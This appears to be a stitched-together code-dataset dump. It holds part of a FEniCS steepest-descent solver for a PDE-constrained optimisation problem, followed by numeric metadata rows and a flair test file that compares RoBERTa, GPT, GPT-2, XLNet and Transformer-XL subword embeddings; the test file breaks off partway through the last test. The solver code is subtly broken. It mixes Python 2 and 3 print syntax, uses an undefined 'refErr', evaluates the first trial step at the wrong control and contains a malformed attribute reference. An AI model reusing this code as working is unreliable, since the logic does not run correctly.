self.adu = (inner(self.q(self.u_k)*grad(du_),grad(v)) + inner(self.dqdu(self.u_k)*du_*grad(self.u_k),grad(v)))*dx
self.Ldu = -inner(self.q(self.u_k)*grad(self.u_k),grad(v))*dx + self.m*v*dx
#form of adjoint
lmbd_ = TrialFunction(V)
self.F_adj = inner(grad(lmbd_), grad(v))*dx + (self.u - self.ud)*v*dx
# form of dJ = (RdJ, v)
RdJ_ = TrialFunction(V)
self.F_R = RdJ_*v*dx - (self.alpha*self.m - self.lmbd)*v*dx
#form of objective functional
#self.J_form = 0.5*((self.u - ud)**2 + self.alpha*self.m**2)*dx
def left_boundary(self, x, on_boundary):
return on_boundary and abs(x[0]) < 1E-14
def right_boundary(self, x, on_boundary):
return on_boundary and abs(x[0]-1) < 1E-14
def q(self, u):
return (1+u)**2
def dqdu(self, u):
return 2*(1+u)
def solve_state(self, iterTol = 1.0e-6, maxIter = 25, dispOutput = False):
"""
Solves the state equation using Newton iterations. Initial guess for
first solve is calculated in __init__, value of u from last m-step
is used thereafter.
Inputs:
iterTol: Iterations stop when |u_(k) - u_(k-1)| < iterTol. Default: 1e-5
maxIter: Maximum number of iterations
dispOutput(True/False): display iteration differences and exact errors at each iteration
writeData(True/False): write solution and convergence data to files
filePath: Path AND name of files WITHOUT file extension
Outputs:
u: solution to PDE
iterDiffArray: Differences between iterative solutions (in H1 norm) at each iteration
exactErrArray: Exact errors (in H1 norm) at each iteration
Saved data:
FEniCS solution saved to <filePath>.pvd
Convergence data saved to <filePath>.csv:
column 0: iterate differences
column 1: exact errors
"""
itErr = 1.0
iterDiffArray = []
iter = 0
while itErr > iterTol and iter < maxIter:
iter += 1
solve(self.adu == self.Ldu, self.du, self.bcdu)
self.u_k.assign(self.u + self.du)
# calculate iterate difference and exact error in L2 norm
itErr = errornorm(self.u_k, self.u, 'H1')
#exErr = errornorm(self.uExpr, u, 'H1')
iterDiffArray.append(itErr) # fill arrays with error data
if dispOutput:
print('k = ' + str(iter) + ' | u-diff = ' + str(itErr))
self.u.assign(self.u_k)
def solve_adjoint(self):
a,L = lhs(self.F_adj), rhs(self.F_adj)
solve(a == L, self.lmbd, self.bc)
def compute_RieszRep(self):
self.solve_state(dispOutput=True)
self.solve_adjoint()
a,L = lhs(self.F_R), rhs(self.F_R)
solve(a == L, self.RdJ)
def step_SD(self, step):
self.m.assign(self.m - step*self.RdJ)
def J(self, m):
return 0.5*((self.u - self.ud)**2 + self.alpha*m**2)*dx
def eval_J(self, m):
self.solve_state(dispOutput=True)
return assemble(self.J(m))
def solveSD(self, step = 500., iterTol = 1.0e-5, maxIter = 25,
dispOutput = False, writeData = False, filePath = 'solution-data/PDEOptSD'):
"""
Solves the PDE-constrained opt. problem using steepest descent (SD)
Inputs:
step: initial SD step-size (will be reduced to satisfy Armijo condition)
iterTol: Iterations stop when J < iterTol. Default: 1e-5
maxIter: Maximum number of iterations
dispOutput (bool): display iteration differences and objective values at each iteration
writeData (bool): write solution and convergence data to files
filePath: Path AND name of files WITHOUT file extension
Outputs:
[u: optimal state function
m: optimal control function
lmbd: Lagrange multiplier]
[mDiff: differences between iterative solutions (in H1 norm) at each iteration
Jk: objective value at each iteration
RdJk: H1 norm of Riesz rep. of dJ at each iteration (SD direction)
NOT IMPLEMENTED: refErr: H1 norms ||m_k-m_ref||.
Will be an empty array if calculateRef method has not been run]
Saved data:
u saved to <filePath>_u.pvd
m saved to <filePath>_m.pvd
lmbd saved to <filePath>_lmbd.pvd
Convergence data saved to <filePath>.csv:
column 0: iterate differences
"""
# perform one step outside of loop to ensure intial values satisfy constraints
Jk = [self.eval_J(self.m)]
mDiff = []
RdJk = []
iter = 0
while Jk[-1] > iterTol and iter < maxIter:
iter += 1
self.compute_RieszRep()
# trial step
self.mt.assign(self.m - step*self.RdJ)
# Frechet derivative of J at point m (previous iterate) in direction GJ, used for b-Armijo
armijo = assemble(-(self.alpha*self.m - self.lmbd)*self.RdJ*dx)
Jt = self.eval_J(self.m)
# require sufficent decrease (Armijo condition)
while Jt > (Jk[-1] + 0.1*step*armijo) and step > 1e-20 and iter > 1:
step = 0.75*step
# trial step with smaller step-size
self.mt.assign(self.m - step*self.RdJ)
Jt = self.eval_J(self.mt)
print 'Step-size set to: ' + str(step)
print 'J_trial = ' + str(Jt)
if step > 1e-20:
# step successful, update control
mDiff.append(errornorm(self.mt, self.m, 'H1'))
RdJk.append(norm(self.RdJ, 'H1'))
self.step_SD(step)
Jk.append(Jt)
else:
print 'Step-size reduced below threshold, convergence failed (?)'
if dispOutput:
print ('k = ' + str(iter) + ' | J = ' + str(Jk[-1]) + ' | norm(m) = '
+ str(norm(self.m, 'H1')) + ' | norm(R(dJ)) = ' + str(norm(self.RdJ, 'H1')))
# remove initial value
Jk.pop(0)
if writeData:
# save solution
solution = File(filePath + '_u.pvd')
solution << self.u
solution = File(filePath + '_m.pvd')
solution << self.m
solution = File(filePath + '_lmbd.pvd')
solution <<self. lmbd
# save convergence data
convergenceData = [mDiff, Jk, RdJk, refErr]
np.savetxt(filePath + '.csv', convergenceData)
return [self.u, self.m, self.lmbd], [mDiff, Jk, RdJk]
"""from fenics_adjoint import *
import moola
class nonlinearPDECOP:
def __init__(self, N, p, ue = Expression('sin(pi*x[0])*sin(pi*x[1])', degree=3), alpha = 1e-07):
mesh = UnitSquareMesh(N,N)
V = FunctionSpace(mesh, 'CG', p)
W = FunctionSpace(mesh, 'CG', p)
# initial guess for control
self.m = interpolate(Expression('pi*x[0]*pi*x[1]', degree=1), W)
self.u = Function(V, name='State')
v = TestFunction(V)
# solve state equation
self.F = (inner(grad(self.u), grad(v)) - self.m*v)*dx
self.bc = DirichletBC(V, 0., 'on_boundary')
# dolfin_adjoint automatically saves iterates for use in control problem
solve(self.F == 0, self.u, self.bc)
self.ud = interpolate(ue, V)
self.alpha = alpha
J = assemble((0.5*inner(self.u-self.ud, self.u-self.ud))*dx + alpha/2*self.m**2*dx)
control = Control(m)
rf = ReducedFunctional(J, control)
"""
| 40.744737
| 126
| 0.555319
| 2,036
| 15,483
| 4.162083
| 0.13998
| 0.021831
| 0.007789
| 0.006372
| 0.797262
| 0.786523
| 0.773307
| 0.751003
| 0.747345
| 0.742506
| 0
| 0.017463
| 0.330556
| 15,483
| 380
| 127
| 40.744737
| 0.800096
| 0.090228
| 0
| 0.77957
| 0
| 0
| 0.05117
| 0.010525
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.016129
| null | null | 0.048387
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73264e0b65514adaff39752188d292ca0389f389
| 31,418
|
py
|
Python
|
tests/test_transformer_embeddings.py
|
OguzKircicek/flair
|
fa3be40ea1d37b38b8f613b83eb3f8984d71c3e9
|
[
"MIT"
] | 1
|
2021-05-19T11:42:58.000Z
|
2021-05-19T11:42:58.000Z
|
tests/test_transformer_embeddings.py
|
OguzKircicek/flair
|
fa3be40ea1d37b38b8f613b83eb3f8984d71c3e9
|
[
"MIT"
] | null | null | null |
tests/test_transformer_embeddings.py
|
OguzKircicek/flair
|
fa3be40ea1d37b38b8f613b83eb3f8984d71c3e9
|
[
"MIT"
] | null | null | null |
import flair
import torch
import pytest
from flair.data import Sentence
from flair.embeddings import (
RoBERTaEmbeddings,
OpenAIGPTEmbeddings,
OpenAIGPT2Embeddings,
XLNetEmbeddings,
TransformerXLEmbeddings,
XLMEmbeddings,
)
from transformers import (
RobertaModel,
RobertaTokenizer,
OpenAIGPTModel,
OpenAIGPTTokenizer,
GPT2Model,
GPT2Tokenizer,
XLNetModel,
XLNetTokenizer,
TransfoXLModel,
TransfoXLTokenizer,
XLMModel,
XLMTokenizer,
)
from typing import List
def calculate_mean_embedding(
    subword_embeddings: List[torch.FloatTensor],
) -> torch.FloatTensor:
    """Return the element-wise mean of the given subword embedding vectors."""
    # Stacking along a new leading axis is equivalent to unsqueezing each
    # vector and concatenating; averaging over that axis pools the subwords.
    stacked = torch.stack(subword_embeddings, dim=0)
    return stacked.mean(dim=0)
@pytest.mark.slow
def test_roberta_embeddings():
    """Compare RoBERTaEmbeddings against hidden states taken directly from the
    underlying transformers RoBERTa model, for every subword pooling operation
    (first / last / first_last / mean) and for multi-layer / scalar-mix setups.
    """
    roberta_model: str = "roberta-base"
    tokenizer = RobertaTokenizer.from_pretrained(roberta_model)
    model = RobertaModel.from_pretrained(
        pretrained_model_name_or_path=roberta_model, output_hidden_states=True
    )
    model.to(flair.device)
    model.eval()
    s: str = "Berlin and Munich have a lot of puppeteer to see ."
    # Reference values: run the raw model on the sentence wrapped in RoBERTa's
    # <s> ... </s> markers and keep entry 1 of the hidden-states tuple as the
    # "first layer" (entry 0 is presumably the embedding-layer output — the
    # diagram below documents the expected subword positions).
    with torch.no_grad():
        tokens = tokenizer.tokenize("<s> " + s + " </s>")
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        tokens_tensor = torch.tensor([indexed_tokens])
        tokens_tensor = tokens_tensor.to(flair.device)
        hidden_states = model(tokens_tensor)[-1]
        first_layer = hidden_states[1][0]
    assert len(first_layer) == len(tokens)
    # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
    #
    # '<s>', 'Ber', 'lin', 'Ġand', 'ĠMunich', 'Ġhave', 'Ġa', 'Ġlot', 'Ġof', 'Ġpupp', 'ete', 'er', 'Ġto', 'Ġsee', 'Ġ.', '</s>'
    # \ / | | | | | | \ | / | | |
    # Berlin and Munich have a lot of puppeteer to see .
    #
    # 0 1 2 3 4 5 6 7 8 9 10
    def embed_sentence(
        sentence: str,
        pooling_operation,
        layers: str = "1",
        use_scalar_mix: bool = False,
    ) -> Sentence:
        # Helper: embed a sentence with flair's RoBERTaEmbeddings using the
        # given pooling / layer configuration and return the flair Sentence.
        embeddings = RoBERTaEmbeddings(
            pretrained_model_name_or_path=roberta_model,
            layers=layers,
            pooling_operation=pooling_operation,
            use_scalar_mix=use_scalar_mix,
        )
        flair_sentence = Sentence(sentence)
        embeddings.embed(flair_sentence)
        return flair_sentence
    # First subword embedding ("Berlin" -> 'Ber' at 1; "puppeteer" -> 'Ġpupp' at 9)
    sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
    first_token_embedding_ref = first_layer[1].tolist()
    first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
    puppeteer_first_subword_embedding_ref = first_layer[9].tolist()
    puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_subword_embedding_ref
        == puppeteer_first_subword_embedding_actual
    )
    # Last subword embedding
    sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
    # First token is splitted into two subwords.
    # As we use "last" as pooling operation, we consider the last subword as "first token" here
    first_token_embedding_ref = first_layer[2].tolist()
    first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
    puppeteer_last_subword_embedding_ref = first_layer[11].tolist()
    puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
    )
    # First and last subword embedding (concatenation of both subword vectors)
    sentence_first_last_subword = embed_sentence(
        sentence=s, pooling_operation="first_last"
    )
    first_token_embedding_ref = torch.cat([first_layer[1], first_layer[2]]).tolist()
    first_token_embedding_actual = sentence_first_last_subword.tokens[
        0
    ].embedding.tolist()
    puppeteer_first_last_subword_embedding_ref = torch.cat(
        [first_layer[9], first_layer[11]]
    ).tolist()
    puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_last_subword_embedding_ref
        == puppeteer_first_last_subword_embedding_actual
    )
    # Mean of all subword embeddings
    sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
    first_token_embedding_ref = calculate_mean_embedding(
        [first_layer[1], first_layer[2]]
    ).tolist()
    first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
    puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
        [first_layer[9], first_layer[10], first_layer[11]]
    ).tolist()
    puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
    )
    # Check embedding dimension when using multiple layers
    sentence_mult_layers = embed_sentence(
        sentence="Munich", pooling_operation="first", layers="1,2,3,4"
    )
    ref_embedding_size = 4 * 768  # four concatenated layers of width 768
    actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
    # Check embedding dimension when using multiple layers and scalar mix
    sentence_mult_layers_scalar_mix = embed_sentence(
        sentence="Berlin",
        pooling_operation="first",
        layers="1,2,3,4",
        use_scalar_mix=True,
    )
    ref_embedding_size = 1 * 768  # scalar mix collapses the layers into one
    actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_gpt_embeddings():
    """Compare OpenAIGPTEmbeddings against hidden states taken directly from
    the underlying transformers GPT model, for every subword pooling operation
    and for multi-layer / scalar-mix setups.
    """
    gpt_model: str = "openai-gpt"
    tokenizer = OpenAIGPTTokenizer.from_pretrained(gpt_model)
    model = OpenAIGPTModel.from_pretrained(
        pretrained_model_name_or_path=gpt_model, output_hidden_states=True
    )
    model.to(flair.device)
    model.eval()
    s: str = "Berlin and Munich have a lot of puppeteer to see ."
    # Reference values: run the raw model (GPT uses no special wrapper tokens)
    # and keep entry 1 of the hidden-states tuple as the "first layer".
    with torch.no_grad():
        tokens = tokenizer.tokenize(s)
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        tokens_tensor = torch.tensor([indexed_tokens])
        tokens_tensor = tokens_tensor.to(flair.device)
        hidden_states = model(tokens_tensor)[-1]
        first_layer = hidden_states[1][0]
    assert len(first_layer) == len(tokens)
    # 0 1 2 3 4 5 6 7 8 9 10 11 12
    #
    # 'berlin</w>', 'and</w>', 'munich</w>', 'have</w>', 'a</w>', 'lot</w>', 'of</w>', 'pupp', 'ete', 'er</w>', 'to</w>', 'see</w>', '.</w>'
    # | | | | | | | \ | / | | |
    # Berlin and Munich have a lot of puppeteer to see .
    #
    # 0 1 2 3 4 5 6 7 8 9 10
    def embed_sentence(
        sentence: str,
        pooling_operation,
        layers: str = "1",
        use_scalar_mix: bool = False,
    ) -> Sentence:
        # Helper: embed a sentence with flair's OpenAIGPTEmbeddings using the
        # given pooling / layer configuration and return the flair Sentence.
        embeddings = OpenAIGPTEmbeddings(
            pretrained_model_name_or_path=gpt_model,
            layers=layers,
            pooling_operation=pooling_operation,
            use_scalar_mix=use_scalar_mix,
        )
        flair_sentence = Sentence(sentence)
        embeddings.embed(flair_sentence)
        return flair_sentence
    # First subword embedding ("puppeteer" -> 'pupp' at index 7)
    sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
    first_token_embedding_ref = first_layer[0].tolist()
    first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
    puppeteer_first_subword_embedding_ref = first_layer[7].tolist()
    puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_subword_embedding_ref
        == puppeteer_first_subword_embedding_actual
    )
    # Last subword embedding ('berlin</w>' is a single subword, so index 0 again)
    sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
    first_token_embedding_ref = first_layer[0].tolist()
    first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
    puppeteer_last_subword_embedding_ref = first_layer[9].tolist()
    puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
    )
    # First and last subword embedding (first == last for single-subword tokens)
    sentence_first_last_subword = embed_sentence(
        sentence=s, pooling_operation="first_last"
    )
    first_token_embedding_ref = torch.cat([first_layer[0], first_layer[0]]).tolist()
    first_token_embedding_actual = sentence_first_last_subword.tokens[
        0
    ].embedding.tolist()
    puppeteer_first_last_subword_embedding_ref = torch.cat(
        [first_layer[7], first_layer[9]]
    ).tolist()
    puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_last_subword_embedding_ref
        == puppeteer_first_last_subword_embedding_actual
    )
    # Mean of all subword embeddings
    sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
    first_token_embedding_ref = calculate_mean_embedding([first_layer[0]]).tolist()
    first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
    puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
        [first_layer[7], first_layer[8], first_layer[9]]
    ).tolist()
    puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
    )
    # Check embedding dimension when using multiple layers
    sentence_mult_layers = embed_sentence(
        sentence="Munich", pooling_operation="first", layers="1,2,3,4"
    )
    ref_embedding_size = 4 * 768  # four concatenated layers of width 768
    actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
    # Check embedding dimension when using multiple layers and scalar mix
    sentence_mult_layers_scalar_mix = embed_sentence(
        sentence="Berlin",
        pooling_operation="first",
        layers="1,2,3,4",
        use_scalar_mix=True,
    )
    ref_embedding_size = 1 * 768  # scalar mix collapses the layers into one
    actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_gpt2_embeddings():
    """Compare OpenAIGPT2Embeddings against hidden states taken directly from
    the underlying transformers GPT-2 model, for every subword pooling
    operation and for multi-layer / scalar-mix setups.
    """
    gpt_model: str = "gpt2-medium"
    tokenizer = GPT2Tokenizer.from_pretrained(gpt_model)
    model = GPT2Model.from_pretrained(
        pretrained_model_name_or_path=gpt_model, output_hidden_states=True
    )
    model.to(flair.device)
    model.eval()
    s: str = "Berlin and Munich have a lot of puppeteer to see ."
    # Reference values: wrap the sentence in <|endoftext|> markers (mirroring
    # what the flair embedding class does) and keep entry 1 of the
    # hidden-states tuple as the "first layer".
    with torch.no_grad():
        tokens = tokenizer.tokenize("<|endoftext|>" + s + "<|endoftext|>")
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        tokens_tensor = torch.tensor([indexed_tokens])
        tokens_tensor = tokens_tensor.to(flair.device)
        hidden_states = model(tokens_tensor)[-1]
        first_layer = hidden_states[1][0]
    assert len(first_layer) == len(tokens)
    # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
    #
    # '<|endoftext|>', 'Ber', 'lin', 'Ġand', 'ĠMunich', 'Ġhave', 'Ġa', 'Ġlot', 'Ġof', 'Ġpupp', 'ete', 'er', 'Ġto', 'Ġsee', 'Ġ.', '<|endoftext|>'
    # \ / | | | | | | \ | / | | |
    # Berlin and Munich have a lot of puppeteer to see .
    #
    # 0 1 2 3 4 5 6 7 8 9 10
    def embed_sentence(
        sentence: str,
        pooling_operation,
        layers: str = "1",
        use_scalar_mix: bool = False,
    ) -> Sentence:
        # Helper: embed a sentence with flair's OpenAIGPT2Embeddings using the
        # given pooling / layer configuration and return the flair Sentence.
        embeddings = OpenAIGPT2Embeddings(
            pretrained_model_name_or_path=gpt_model,
            layers=layers,
            pooling_operation=pooling_operation,
            use_scalar_mix=use_scalar_mix,
        )
        flair_sentence = Sentence(sentence)
        embeddings.embed(flair_sentence)
        return flair_sentence
    # First subword embedding ("Berlin" -> 'Ber' at 1; "puppeteer" -> 'Ġpupp' at 9)
    sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
    first_token_embedding_ref = first_layer[1].tolist()
    first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
    puppeteer_first_subword_embedding_ref = first_layer[9].tolist()
    puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_subword_embedding_ref
        == puppeteer_first_subword_embedding_actual
    )
    # Last subword embedding
    sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
    # First token is splitted into two subwords.
    # As we use "last" as pooling operation, we consider the last subword as "first token" here
    first_token_embedding_ref = first_layer[2].tolist()
    first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
    puppeteer_last_subword_embedding_ref = first_layer[11].tolist()
    puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
    )
    # First and last subword embedding (concatenation of both subword vectors)
    sentence_first_last_subword = embed_sentence(
        sentence=s, pooling_operation="first_last"
    )
    first_token_embedding_ref = torch.cat([first_layer[1], first_layer[2]]).tolist()
    first_token_embedding_actual = sentence_first_last_subword.tokens[
        0
    ].embedding.tolist()
    puppeteer_first_last_subword_embedding_ref = torch.cat(
        [first_layer[9], first_layer[11]]
    ).tolist()
    puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_last_subword_embedding_ref
        == puppeteer_first_last_subword_embedding_actual
    )
    # Mean of all subword embeddings
    sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
    first_token_embedding_ref = calculate_mean_embedding(
        [first_layer[1], first_layer[2]]
    ).tolist()
    first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
    puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
        [first_layer[9], first_layer[10], first_layer[11]]
    ).tolist()
    puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
    )
    # Check embedding dimension when using multiple layers
    sentence_mult_layers = embed_sentence(
        sentence="Munich", pooling_operation="first", layers="1,2,3,4"
    )
    ref_embedding_size = 4 * 1024  # gpt2-medium hidden size is 1024
    actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
    # Check embedding dimension when using multiple layers and scalar mix
    sentence_mult_layers_scalar_mix = embed_sentence(
        sentence="Berlin",
        pooling_operation="first",
        layers="1,2,3,4",
        use_scalar_mix=True,
    )
    ref_embedding_size = 1 * 1024  # scalar mix collapses the layers into one
    actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_xlnet_embeddings():
    """Compare XLNetEmbeddings against hidden states taken directly from the
    underlying transformers XLNet model, for every subword pooling operation
    and for multi-layer / scalar-mix setups.
    """
    xlnet_model: str = "xlnet-large-cased"
    tokenizer = XLNetTokenizer.from_pretrained(xlnet_model)
    model = XLNetModel.from_pretrained(
        pretrained_model_name_or_path=xlnet_model, output_hidden_states=True
    )
    model.to(flair.device)
    model.eval()
    s: str = "Berlin and Munich have a lot of puppeteer to see ."
    # Reference values: run the raw model on the sentence wrapped in <s>...</s>
    # markers and keep entry 1 of the hidden-states tuple as the "first layer".
    # (A leftover debug `print(tokens)` was removed here.)
    with torch.no_grad():
        tokens = tokenizer.tokenize("<s>" + s + "</s>")
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        tokens_tensor = torch.tensor([indexed_tokens])
        tokens_tensor = tokens_tensor.to(flair.device)
        hidden_states = model(tokens_tensor)[-1]
        first_layer = hidden_states[1][0]
    assert len(first_layer) == len(tokens)
    # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
    #
    # '<s>', '▁Berlin', '▁and', '▁Munich', '▁have', '▁a', '▁lot', '▁of', '▁puppet', 'eer', '▁to', '▁see', '▁', '.', '</s>'
    # | | | | | | | \ / | | \ /
    # Berlin and Munich have a lot of puppeteer to see .
    #
    # 0 1 2 3 4 5 6 7 8 9 10
    def embed_sentence(
        sentence: str,
        pooling_operation,
        layers: str = "1",
        use_scalar_mix: bool = False,
    ) -> Sentence:
        # Helper: embed a sentence with flair's XLNetEmbeddings using the
        # given pooling / layer configuration and return the flair Sentence.
        embeddings = XLNetEmbeddings(
            pretrained_model_name_or_path=xlnet_model,
            layers=layers,
            pooling_operation=pooling_operation,
            use_scalar_mix=use_scalar_mix,
        )
        flair_sentence = Sentence(sentence)
        embeddings.embed(flair_sentence)
        return flair_sentence
    # First subword embedding ("Berlin" -> '▁Berlin' at 1; "puppeteer" -> '▁puppet' at 8)
    sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
    first_token_embedding_ref = first_layer[1].tolist()
    first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
    puppeteer_first_subword_embedding_ref = first_layer[8].tolist()
    puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_subword_embedding_ref
        == puppeteer_first_subword_embedding_actual
    )
    # Last subword embedding ('▁Berlin' is a single subword, so index 1 again)
    sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
    first_token_embedding_ref = first_layer[1].tolist()
    first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
    puppeteer_last_subword_embedding_ref = first_layer[9].tolist()
    puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
    )
    # First and last subword embedding (first == last for single-subword tokens)
    sentence_first_last_subword = embed_sentence(
        sentence=s, pooling_operation="first_last"
    )
    first_token_embedding_ref = torch.cat([first_layer[1], first_layer[1]]).tolist()
    first_token_embedding_actual = sentence_first_last_subword.tokens[
        0
    ].embedding.tolist()
    puppeteer_first_last_subword_embedding_ref = torch.cat(
        [first_layer[8], first_layer[9]]
    ).tolist()
    puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_last_subword_embedding_ref
        == puppeteer_first_last_subword_embedding_actual
    )
    # Mean of all subword embeddings
    sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
    first_token_embedding_ref = calculate_mean_embedding([first_layer[1]]).tolist()
    first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
    puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
        [first_layer[8], first_layer[9]]
    ).tolist()
    puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
    )
    # Check embedding dimension when using multiple layers
    sentence_mult_layers = embed_sentence(
        sentence="Munich", pooling_operation="first", layers="1,2,3,4"
    )
    ref_embedding_size = 4 * model.d_model  # four concatenated layers
    actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
    # Check embedding dimension when using multiple layers and scalar mix
    sentence_mult_layers_scalar_mix = embed_sentence(
        sentence="Berlin",
        pooling_operation="first",
        layers="1,2,3,4",
        use_scalar_mix=True,
    )
    ref_embedding_size = 1 * model.d_model  # scalar mix collapses the layers
    actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_transformer_xl_embeddings():
    """Compare TransformerXLEmbeddings against hidden states taken directly
    from the underlying transformers Transformer-XL model.

    Transformer-XL uses word-level tokenization, so no subword pooling
    variants are exercised here — only direct token comparison plus
    multi-layer / scalar-mix dimension checks.
    """
    transfo_model: str = "transfo-xl-wt103"
    tokenizer = TransfoXLTokenizer.from_pretrained(transfo_model)
    model = TransfoXLModel.from_pretrained(
        pretrained_model_name_or_path=transfo_model, output_hidden_states=True
    )
    model.to(flair.device)
    model.eval()
    s: str = "Berlin and Munich have a lot of puppeteer to see ."
    # Reference values: run the raw model on the sentence with a trailing
    # <eos> marker and keep entry 1 of the hidden-states tuple as the
    # "first layer". (A leftover debug `print(tokens)` was removed here.)
    with torch.no_grad():
        tokens = tokenizer.tokenize(s + "<eos>")
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        tokens_tensor = torch.tensor([indexed_tokens])
        tokens_tensor = tokens_tensor.to(flair.device)
        hidden_states = model(tokens_tensor)[-1]
        first_layer = hidden_states[1][0]
    assert len(first_layer) == len(tokens)
    # 0 1 2 3 4 5 6 7 8 9 10 11
    #
    # 'Berlin', 'and', 'Munich', 'have', 'a', 'lot', 'of', 'puppeteer', 'to', 'see', '.', '<eos>'
